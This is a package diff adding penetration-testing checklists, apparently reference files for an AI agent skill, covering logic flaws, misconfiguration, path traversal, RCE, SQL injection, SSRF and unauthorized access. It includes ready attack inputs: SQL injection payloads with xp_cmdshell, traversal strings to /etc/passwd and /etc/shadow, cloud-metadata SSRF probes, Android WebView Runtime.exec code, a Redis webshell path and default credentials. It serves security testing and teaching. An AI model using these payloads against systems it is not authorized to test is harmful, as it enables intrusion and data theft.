@vigolium/piolium 0.0.1

package/skills/wooyun-legacy/references/checklists/logic-flaws-checklist.md

@@ -0,0 +1,95 @@
+# Logic Flaws Testing Checklist
+> Derived from ~85 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Context |
+|-----------|---------|
+| `code`, `validatecode` | SMS/email verification codes |
+| `password`, `newPwd` | Password reset flows |
+| `sign`, `timestamp` | Request signing mechanisms |
+| `v`, `from` | Version/source parameters |
+| `adultNum`, `childNum` | Quantity fields in orders |
+| `amount`, `price` | Payment amounts |
+| `token`, `newMobile` | Session/binding tokens |
+| `flag`, `phone` | Password recovery flow control |
+
+## Common Attack Patterns (by frequency)
+1. **Arbitrary password reset** (most common)
+   - Verification code leaked in response
+   - Short/numeric verification codes (4-digit) with no rate limiting
+   - Verification not bound to phone/account
+   - Client-side verification bypass (modify response)
+2. **Payment amount tampering**
+   - Price sent in client request, not validated server-side
+   - Negative quantity to reduce total
+   - Race condition in cart/checkout flow
+3. **SMS/verification code abuse**
+   - No rate limit on code sending (SMS bombing)
+   - No expiration on verification codes
+   - Code reuse across different operations
+4. **Authorization bypass (IDOR)**
+   - Sequential user/order IDs enable enumeration
+   - Delete/modify operations lack ownership check
+5. **Client-side trust**
+   - JavaScript validation only, no server-side check
+   - Response manipulation to bypass checks
+
+## Bypass Techniques
+- **Response tampering**: Intercept and change server response (e.g., `false` to `true`)
+- **Verification code brute-force**: 4-digit codes = 10,000 attempts, often no lockout
+- **Base64 encoded codes**: Decode, enumerate, re-encode
+- **Negative values**: Set quantity to `-1` to create credit
+- **Step skipping**: Jump directly to final step of multi-step process
+- **Parameter pollution**: Submit same parameter twice with different values
+- **IP spoofing**: `X-Forwarded-For` to bypass IP-based restrictions
+
+## Quick Test Vectors
+```
+# Password reset - verify code in response
+1. Initiate reset, capture response
+2. Check if verification code appears in JSON/HTML response
+
+# Brute-force short verification codes
+POST /verify?phone=TARGET&code=FUZZ
+# Fuzz 0000-9999 with no rate limiting
+
+# Payment tampering
+# Original: amount=19900 (199.00)
+# Modified: amount=1 (0.01)
+
+# Negative quantity
+# Original: count=1
+# Modified: count=-1
+
+# Skip verification step
+# Go directly to /reset/step3 without completing step2
+
+# Response manipulation
+# Change {"result":"fail"} to {"result":"success"}
+```
+
+## Testing Methodology
+1. Map all multi-step flows (registration, password reset, payment)
+2. Test each step independently -- can steps be skipped?
+3. Check if verification codes appear in responses
+4. Test rate limiting on verification endpoints
+5. Attempt parameter tampering on price/quantity fields
+6. Verify server-side validation matches client-side
+7. Check IDOR on all endpoints with user/object IDs
+8. Test for race conditions on balance/inventory operations
+
+## High-Impact Targets
+- Password reset/recovery flows
+- Payment and checkout processes
+- SMS verification endpoints
+- Account binding (email, phone, OAuth)
+- Admin operations without re-authentication
+- Coupon/discount redemption
+
+## Common Root Causes
+- Verification logic in client-side JavaScript only
+- Verification codes returned in API responses
+- No rate limiting on authentication attempts
+- Price/amount accepted from client without server-side recalculation
+- Sequential predictable IDs without authorization checks
+- Multi-step processes that don't validate completion of prior steps

package/skills/wooyun-legacy/references/checklists/misconfig-checklist.md

@@ -0,0 +1,124 @@
+# Misconfiguration Testing Checklist
+> Derived from ~41 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Context |
+|-----------|---------|
+| `password`, `pwd` | Login forms for default creds |
+| `cmd` | Command execution interfaces |
+| `comment` | Input fields on exposed panels |
+| `service` | Service selectors |
+| `ObjName`, `MODE` | Management interface parameters |
+
+## Common Misconfiguration Categories
+
+### 1. Exposed Management Interfaces
+| Service | Path/Port | Risk |
+|---------|-----------|------|
+| WebLogic Console | `:7001/console` | WAR deploy → shell |
+| JBoss JMX | `/jmx-console/`, `/invoker/JMXInvokerServlet` | RCE |
+| Tomcat Manager | `/manager/html` | WAR deploy → shell |
+| phpMyAdmin | `/phpmyadmin/` | Database access |
+| Struts2 | `/devmode.action` | RCE via OGNL |
+| Spring Actuator | `/actuator/env` | Credential leak |
+| Druid Monitor | `/druid/` | SQL query monitor |
+
+### 2. DNS Zone Transfer
+```bash
+# Test for DNS zone transfer
+dig axfr @ns1.target.com target.com
+dig axfr @ns2.target.com target.com
+# Reveals all DNS records, internal hostnames, IP addresses
+```
+
+### 3. Directory Listing
+- Web server directory indexing enabled
+- Backup directories accessible (`/backup/`, `/bak/`)
+- Upload directories browsable (`/upload/`, `/uploads/`)
+
+### 4. Service Exposure (No Authentication)
+| Service | Port | Check |
+|---------|------|-------|
+| MongoDB | 27017 | `mongo TARGET:27017` |
+| Redis | 6379 | `redis-cli -h TARGET` |
+| Memcached | 11211 | `telnet TARGET 11211` |
+| Elasticsearch | 9200 | `curl TARGET:9200` |
+| Rsync | 873 | `rsync TARGET::` |
+| FTP Anonymous | 21 | `ftp TARGET` (anonymous) |
+| Docker API | 2375 | `curl TARGET:2375/info` |
+
+### 5. IIS/Apache Specific
+- IIS short filename disclosure (`~1` enumeration)
+- IIS write permission enabled (PUT method)
+- Apache `.htaccess` bypass
+- `crossdomain.xml` / `clientaccesspolicy.xml` overly permissive
+- Server-status/server-info pages exposed
+
+## Quick Test Vectors
+```
+# Management interfaces
+/console/
+/manager/html
+/jmx-console/
+/admin/
+/phpmyadmin/
+/invoker/JMXInvokerServlet
+
+# Configuration files
+/web.xml
+/web.config
+/crossdomain.xml
+/robots.txt
+/sitemap.xml
+
+# Debug/info endpoints
+/phpinfo.php
+/info.php
+/server-status
+/server-info
+/.env
+
+# DNS zone transfer
+dig axfr @ns1.target.com target.com
+
+# Service scan (common misconfig ports)
+nmap -sV -p 21,873,2375,6379,8080,9200,11211,27017 TARGET
+
+# FTP anonymous access
+ftp TARGET  # try anonymous / anonymous@
+
+# Rsync enumeration
+rsync TARGET::
+rsync TARGET::module_name/
+```
+
+## Attack Escalation Paths
+```
+JBoss JMXInvokerServlet → Deploy WAR → Webshell → Internal network
+Rsync anonymous → Source code → Database credentials → Data
+FTP anonymous → web.config → DB credentials → SQL access
+MongoDB no-auth → User data dump → Credential reuse
+Redis no-auth → CONFIG SET dir → Write webshell
+DNS zone transfer → Internal hostnames → Targeted attacks
+```
+
+## Testing Methodology
+1. Scan for common management interfaces and default ports
+2. Test DNS zone transfer on all nameservers
+3. Check for directory listing on web roots and common paths
+4. Probe database/cache services for unauthenticated access
+5. Test IIS-specific vulnerabilities (short names, write perms)
+6. Check cross-domain policy files for overly broad access
+7. Verify debug/info endpoints are disabled in production
+8. Test FTP and Rsync for anonymous access
+9. Check for default installation files and directories
+
+## Common Root Causes
+- Management consoles bound to 0.0.0.0 instead of localhost
+- Default installations not hardened post-deployment
+- DNS servers allowing zone transfers to any requester
+- Services deployed without authentication requirements
+- Web server directory indexing enabled by default
+- Debug features and info pages left in production
+- Cross-domain policies set to wildcard (`*`)
+- IIS write permissions not properly restricted

package/skills/wooyun-legacy/references/checklists/path-traversal-checklist.md

@@ -0,0 +1,87 @@
+# Path Traversal Testing Checklist
+> Derived from ~30 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Frequency | Context |
+|-----------|-----------|---------|
+| `filePath` / `filepath` | High | File download/read endpoints |
+| `filename` | High | Download handlers |
+| `url` / `urlParam` | Medium | Proxy/fetch endpoints |
+| `RelatedPath` | Medium | File management panels |
+| `dd` | Medium | Document download links |
+| `image` | Low | Image proxy/thumbnail |
+| `path`, `name`, `n` | Low | Generic file parameters |
+| `FileID`, `FileName` | Low | Attachment download |
+| `Accessory` | Low | CMS attachment handlers |
+| `hDFile` | Low | Download handlers |
+| `tpl` | Low | Template inclusion |
+| `bg` | Low | Background/theme loaders |
+
+## Common Attack Patterns
+1. **Direct file read** via download endpoints (most common)
+2. **Directory listing** through misconfigured web servers
+3. **CMS-specific file read** (phpCMS, SiteServer, Yxcms, FineCMS)
+4. **Backup file exposure** via predictable paths
+5. **Configuration file leak** (database.php, web.xml, web.config)
+6. **Null byte injection** to bypass extension checks
+
+## Bypass Techniques
+- `../` replaced with empty string? Use `....//` or `..././`
+- Extension check? Use null byte: `../../etc/passwd%00.jpg`
+- Absolute path blocked? Try relative traversal
+- Forward slash filtered? Try backslash on Windows: `..\..\..\`
+- URL encoding: `%2e%2e%2f` or double-encode `%252e%252e%252f`
+- Browser vs curl: Some traversals only work via raw HTTP (not browser)
+
+## Quick Test Vectors
+```
+# Basic traversal
+../../../etc/passwd
+..\..\..\..\windows\win.ini
+
+# Null byte bypass
+../../../etc/passwd%00.jpg
+../../../etc/passwd%00.png
+
+# Double-encoding
+%252e%252e%252f%252e%252e%252fetc/passwd
+
+# Filter bypass (double dots replaced)
+....//....//....//etc/passwd
+..././..././..././etc/passwd
+
+# Java/Tomcat paths
+/WEB-INF/web.xml
+/WEB-INF/classes/
+/META-INF/MANIFEST.MF
+
+# Windows targets
+..\..\..\..\windows\system32\drivers\etc\hosts
+```
+
+## High-Value Target Files
+| Platform | Files |
+|----------|-------|
+| Linux | `/etc/passwd`, `/etc/shadow` |
+| Windows | `win.ini`, `boot.ini` |
+| PHP | `config.php`, `database.php`, `.env` |
+| Java | `WEB-INF/web.xml`, `WEB-INF/classes/` |
+| .NET | `web.config`, `machine.config` |
+| General | `.svn/entries`, `.git/config`, `.bash_history` |
+
+## Testing Methodology
+1. Identify all file download/read endpoints
+2. Map parameters that accept file paths or names
+3. Test basic `../` traversal sequences (3-8 levels deep)
+4. Attempt null byte injection for extension bypasses
+5. Try encoding variations if basic traversal is filtered
+6. Target configuration files for credential extraction
+7. Check if directory listing is enabled on web roots
+8. Test both GET and POST parameter variants
+
+## Common Root Causes
+- `file_get_contents($_GET['path'])` without sanitization
+- Download handlers that pass user input directly to filesystem
+- Incomplete filtering (replacing `../` once instead of recursively)
+- Extension validation via client-side or bypassable checks
+- CMS file managers exposing parent directory navigation

package/skills/wooyun-legacy/references/checklists/rce-checklist.md

@@ -0,0 +1,93 @@
+# Remote Code Execution (RCE) Testing Checklist
+> Derived from 11 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Context | Notes |
+|-----------|---------|-------|
+| `id` | 1x | Resource identifier triggering backend processing |
+| `url` | 1x | URL parameter in protocol handlers |
+| `repo` | 1x | Repository/package name parameters |
+| `intent` | 1x | Android intent parameters |
+| `apkpackagename` | 1x | Android package identifiers |
+
+## Attack Pattern Distribution
+| Pattern | Count | Percentage |
+|---------|-------|------------|
+| Remote command execution | 8 | 73% |
+| Remote code execution | 3 | 27% |
+
+## Vulnerability Categories
+
+### 1. Android WebView Interface Exploitation (~35% of cases)
+The most common RCE vector in this dataset targets mobile apps.
+
+**Mechanism**: `addJavascriptInterface()` in Android WebView (pre-4.2)
+exposes Java objects to JavaScript, enabling `java.lang.Runtime.exec()`.
+
+**Detection pattern:**
+```javascript
+// Scan for exposed interfaces
+for (var obj in window) {
+  if ("getClass" in window[obj]) {
+    // Vulnerable interface found
+  }
+}
+```
+
+**Exploitation:**
+```javascript
+function execute(cmdArgs) {
+  return Navigator.getClass()
+    .forName("java.lang.Runtime")
+    .getMethod("getRuntime", null)
+    .invoke(null, null)
+    .exec(cmdArgs);
+}
+execute(["/system/bin/sh", "-c", "id"]);
+```
+
+### 2. Struts2 Remote Code Execution (~25% of cases)
+Same as command execution but categorized under RCE.
+- University and government systems running outdated Struts2
+- `.action` endpoints with OGNL injection
+
+### 3. Desktop Application Protocol Handlers (~15% of cases)
+- Custom protocol schemes (e.g., `bdbrowser://`)
+- IM client message handling leading to local file/command execution
+- Auto-update mechanisms hijacked via MITM
+
+### 4. Enterprise Software RCE (~15% of cases)
+- SAGE ERP universal RCE
+- ActiveX buffer overflow in client applications
+- SourceForge-class platform vulnerabilities
+
+### 5. Client-Side MITM to RCE (~10% of cases)
+- Auto-update over HTTP (no HTTPS/signature verification)
+- Attacker replaces update binary via network interception
+- Affects desktop and mobile applications
+
+## Quick Test Vectors
+```
+1. Android apps: Check for addJavascriptInterface in APK
+2. Web apps: Test .action/.do endpoints for Struts2
+3. Desktop apps: Test custom protocol handlers
+4. Auto-update: Check if updates use HTTPS + signature verification
+5. Enterprise: Check exposed management consoles
+6. Mobile: Test WebView for JavaScript bridge interfaces
+```
+
+## High-Value Targets
+- **Mobile applications**: Android apps with WebView bridges
+- **IM/messaging clients**: Message rendering with code execution
+- **Desktop applications**: Protocol handlers and auto-updaters
+- **Enterprise ERP systems**: Server-side code execution
+- **Educational institution sites**: Often running outdated frameworks
+
+## Root Causes
+| Cause | Frequency |
+|-------|-----------|
+| Insecure Android WebView bridges | Most common |
+| Unpatched framework vulnerabilities | Very common |
+| Unsafe protocol handler registration | Occasional |
+| HTTP auto-update without verification | Occasional |
+| ActiveX/legacy plugin vulnerabilities | Rare |

package/skills/wooyun-legacy/references/checklists/sql-injection-checklist.md

@@ -0,0 +1,97 @@
+# SQL Injection Testing Checklist
+> Derived from 234 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Frequency | Notes |
+|-----------|-----------|-------|
+| `id` | 46x | Most commonly injectable; numeric IDs in GET requests |
+| `action` | 8x | Action dispatch parameters in MVC frameworks |
+| `act` | 5x | Shortened action parameter variant |
+| `type` / `typeId` / `typeid` | 8x | Category/type selectors, often unquoted integers |
+| `username` | 2x | Login forms, user lookups |
+| `s` | 3x | Search parameters |
+| `aid` | 3x | Article/asset IDs |
+| `mod` | 4x | Module selectors |
+| `uid` / `rid` / `cid` / `pid` | 10x | Various entity ID parameters |
+| `Channel` | 1x | Content management routing |
+
+## Attack Pattern Distribution
+| Pattern | Count | Percentage |
+|---------|-------|------------|
+| Direct injection | 42 | 71% |
+| Data leakage | 4 | 7% |
+| Directory traversal chain | 1 | 2% |
+| Getshell via SQLi | 1 | 2% |
+
+## Common Injection Techniques (by frequency)
+
+### 1. Error-Based (most common)
+```
+' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x71,
+  (SELECT user()),0x71,FLOOR(RAND(0)*2))x
+  FROM information_schema.tables GROUP BY x)a)--
+```
+
+### 2. UNION-Based
+```
+' UNION SELECT 1,2,3,CONCAT(username,0x23,password)
+  FROM admin_table--
+```
+```
+UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),
+  CONCAT((...),FLOOR(RAND(0)*2))a
+  FROM information_schema.tables GROUP BY a)b
+```
+
+### 3. Time-Based Blind
+```
+'; WAITFOR DELAY '0:0:5'--         (MSSQL)
+' AND SLEEP(5)--                    (MySQL)
+```
+
+### 4. Boolean-Based Blind
+```
+' AND 2020=2020 AND 'x'='x
+' AND 1=1--
+' AND 1=2--
+```
+
+### 5. Stacked Queries (MSSQL)
+```
+'; WAITFOR DELAY '0:0:5'--
+'; EXEC xp_cmdshell('whoami')--
+```
+
+## Bypass Techniques
+- **Comment injection**: `/**/` between SQL keywords to evade WAF
+- **Case variation**: `SeLeCt`, `uNiOn`
+- **URL encoding**: `%27` for single quote, `%20` for space
+- **Double encoding**: `%2527` for single quote
+- **Array parameter abuse**: `gids[100][0]=) AND (subquery)#`
+- **Numeric context**: Unquoted integer parameters skip string-based filters
+
+## Quick Test Vectors
+```
+1. id=1'                              (error detection)
+2. id=1 AND 1=1 / id=1 AND 1=2       (boolean blind)
+3. id=1' OR '1'='1                    (auth bypass)
+4. id=1 AND SLEEP(5)                  (time blind MySQL)
+5. id=1'; WAITFOR DELAY '0:0:5'--    (time blind MSSQL)
+6. id=1 UNION SELECT NULL,NULL,NULL-- (column enumeration)
+7. id=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- (error-based)
+```
+
+## High-Value Targets
+- **Login forms**: `username` parameter with stacked queries
+- **Search functions**: `keyword`/`s` parameters with UNION injection
+- **Content pages**: `id`/`typeid` in article/news detail pages
+- **API endpoints**: `action` parameters in `.do`/`.action` handlers
+- **ASP.NET apps**: `__EVENTVALIDATION` and viewstate parameters
+
+## Database Distribution
+| DBMS | Observed Frequency |
+|------|-------------------|
+| MySQL 5.x | Most common |
+| Microsoft SQL Server | Second most common |
+| Oracle | Occasional (government systems) |
+| Access | Legacy ASP applications |

package/skills/wooyun-legacy/references/checklists/ssrf-checklist.md

@@ -0,0 +1,99 @@
+# SSRF Testing Checklist
+> Derived from ~40 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Context |
+|-----------|---------|
+| `url` | URL fetch/proxy endpoints |
+| `target` | Redirect or proxy targets |
+| `inputFile` | File processing endpoints |
+| `s_url` | Share/callback URLs |
+| `imageUrl` | Image proxy/thumbnail |
+| `callback` | JSONP/webhook endpoints |
+| `link` | URL preview/unfurl |
+| `src`, `ref` | Resource loading parameters |
+
+## Common Attack Patterns
+1. **Internal network scanning** via Weblogic UDDI Explorer (most common)
+   - `/uddiexplorer/SearchPublicRegistries.jsp` (CVE-2014-4210)
+2. **URL proxy/fetch endpoints** with no domain restriction
+3. **Image proxy SSRF** -- thumbnail generators that fetch arbitrary URLs
+4. **Transcoding service SSRF** -- web page conversion services
+5. **Webhook/callback SSRF** -- user-supplied callback URLs
+6. **File processing SSRF** -- XML/document parsers fetching external resources
+
+## Bypass Techniques
+- **IP representations**: `127.0.0.1` → `0x7f000001`, `2130706433`, `0177.0.0.1`
+- **DNS rebinding**: Domain that resolves to internal IP
+- **URL encoding**: `%31%32%37%2e%30%2e%30%2e%31`
+- **Redirect chain**: External URL that 302-redirects to internal address
+- **IPv6**: `[::1]`, `[::ffff:127.0.0.1]`
+- **URL parser differences**: `http://evil.com#@internal.host`
+- **Protocol smuggling**: `gopher://`, `dict://`, `file://`
+- **Partial domain match bypass**: `internal.company.com.evil.com`
+
+## Quick Test Vectors
+```
+# Basic internal network probe
+http://127.0.0.1
+http://localhost
+http://[::1]
+http://0x7f000001
+
+# Cloud metadata endpoints
+http://169.254.169.254/latest/meta-data/
+http://metadata.google.internal/
+
+# Common internal services
+http://INTERNAL_IP:8080  (Tomcat)
+http://INTERNAL_IP:6379  (Redis)
+http://INTERNAL_IP:27017 (MongoDB)
+http://INTERNAL_IP:3306  (MySQL)
+http://INTERNAL_IP:9200  (Elasticsearch)
+http://INTERNAL_IP:11211 (Memcached)
+
+# Weblogic SSRF (CVE-2014-4210)
+/uddiexplorer/SearchPublicRegistries.jsp
+  ?operator=http://INTERNAL_IP:PORT
+  &rdoSearch=name&txtSearchname=sdf
+  &txtSearchkey=&txtSearchfor=
+  &selfor=Business+location
+  &btnSubmit=Search
+
+# Protocol smuggling
+gopher://internal:6379/_INFO
+dict://internal:6379/INFO
+```
+
+## Testing Methodology
+1. Identify all endpoints that accept URLs or fetch remote resources
+2. Test with `http://127.0.0.1` and known internal IP ranges
+3. Observe response differences (timing, content, error messages)
+4. Use time-based detection: compare response time for open vs closed ports
+5. Test alternative IP representations and protocols
+6. Check for Weblogic UDDI Explorer on Java applications
+7. Probe for cloud metadata services
+8. Test redirect-based bypasses if direct internal URLs are blocked
+
+## Port Detection via Response Analysis
+| Response | Meaning |
+|----------|---------|
+| Connection refused / different error | Port closed, host alive |
+| Timeout | Host down or filtered |
+| Content returned | Port open, service active |
+| Specific error message | Port open, protocol mismatch |
+
+## High-Value Internal Targets
+- Redis (6379) -- can write webshell via `CONFIG SET dir`
+- MongoDB (27017) -- often no auth, full DB access
+- Memcached (11211) -- dump cached session data
+- Elasticsearch (9200) -- search index data exposure
+- Cloud metadata (169.254.169.254) -- IAM credentials
+- Internal admin panels (8080, 8443, 9090)
+
+## Common Root Causes
+- URL fetch functions with no domain/IP allowlist
+- Weblogic UDDI Explorer exposed to internet
+- Image proxy services without input validation
+- Incomplete blocklist (blocks `127.0.0.1` but not `0x7f000001`)
+- No restriction on URL protocol scheme

package/skills/wooyun-legacy/references/checklists/unauthorized-access-checklist.md

@@ -0,0 +1,89 @@
+# Unauthorized Access Testing Checklist
+> Derived from ~55 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Context |
+|-----------|---------|
+| `uid`, `id` | User/resource identifiers (IDOR) |
+| `cmd` | Command/action parameters |
+| `lstate` | Login state flags |
+| `mod`, `do` | Module/action selectors |
+| `ajax` | AJAX request flags (auth bypass) |
+| `gsid`, `type` | Session/type identifiers |
+| `trueName` | User lookup endpoints |
+| `filePath` | File access parameters |
+| `code`, `method` | API method selectors |
+
+## Common Attack Patterns (by frequency)
+1. **Horizontal privilege escalation (IDOR)** -- Change user ID to access other accounts
+2. **Authentication bypass** -- Direct URL access to admin pages
+3. **Unauthenticated service access** -- Redis, MongoDB, Memcached exposed without auth
+4. **Vertical privilege escalation** -- Regular user accessing admin functions
+5. **Cookie/session manipulation** -- Forged or replayed authentication tokens
+6. **Sandbox escape** -- Kiosk/terminal breakout via UI interaction
+
+## Unauthenticated Service Exposure
+| Service | Default Port | Risk |
+|---------|-------------|------|
+| Redis | 6379 | Webshell write, key dump |
+| MongoDB | 27017 | Full database access |
+| Memcached | 11211 | Session data, credential leak |
+| Elasticsearch | 9200 | Index data exposure |
+| JBOSS JMX | 8080 | Remote code execution |
+| Docker API | 2375 | Container escape |
+| Zabbix | 10051 | Command execution |
+| Hadoop | 50070 | HDFS data access |
+
+## Bypass Techniques
+- **Direct URL access**: Skip login page, navigate directly to admin endpoints
+- **Cookie manipulation**: Set `isAdmin=1` or modify role in JWT
+- **Parameter injection**: Add `&admin=true` or `&role=admin`
+- **HTTP method switching**: Try PUT/DELETE when GET/POST is blocked
+- **Path traversal to admin**: `/admin/../admin/` or `/./admin/`
+- **Request header spoofing**: `X-Forwarded-For: 127.0.0.1` for IP allowlists
+- **SQL injection in login**: `' OR 1=1--` in username/password fields
+- **Default credentials**: admin/admin, weblogic/weblogic, root/root
+
+## Quick Test Vectors
+```
+# Direct admin access
+/admin/
+/manager/
+/console/
+/system/
+/management/
+
+# Service probing
+redis-cli -h TARGET -p 6379 INFO
+mongo TARGET:27017
+curl http://TARGET:9200/_cat/indices
+
+# IDOR testing
+GET /api/user/profile?id=1001  (own)
+GET /api/user/profile?id=1002  (other)
+GET /api/user/profile?id=1     (admin)
+
+# Authentication bypass
+# Remove session cookie and access protected endpoints
+# Modify user role in cookie/JWT
+# Access API endpoints directly without authentication
+```
+
+## Testing Methodology
+1. Enumerate all endpoints and map authentication requirements
+2. Access each endpoint without authentication
+3. Test IDOR by modifying user/resource IDs in requests
+4. Scan for exposed database/infrastructure services
+5. Try default credentials on admin panels and services
+6. Test cookie/token manipulation for privilege escalation
+7. Check if API endpoints enforce same auth as web UI
+8. Verify that role checks are server-side, not client-side
+
+## Common Root Causes
+- Missing authentication middleware on admin routes
+- Authorization checks in frontend JavaScript only
+- Database services bound to 0.0.0.0 without authentication
+- Sequential predictable IDs without ownership verification
+- Session/role stored in client-modifiable cookie
+- Default credentials left unchanged after deployment
+- IP-based access control that trusts proxy headers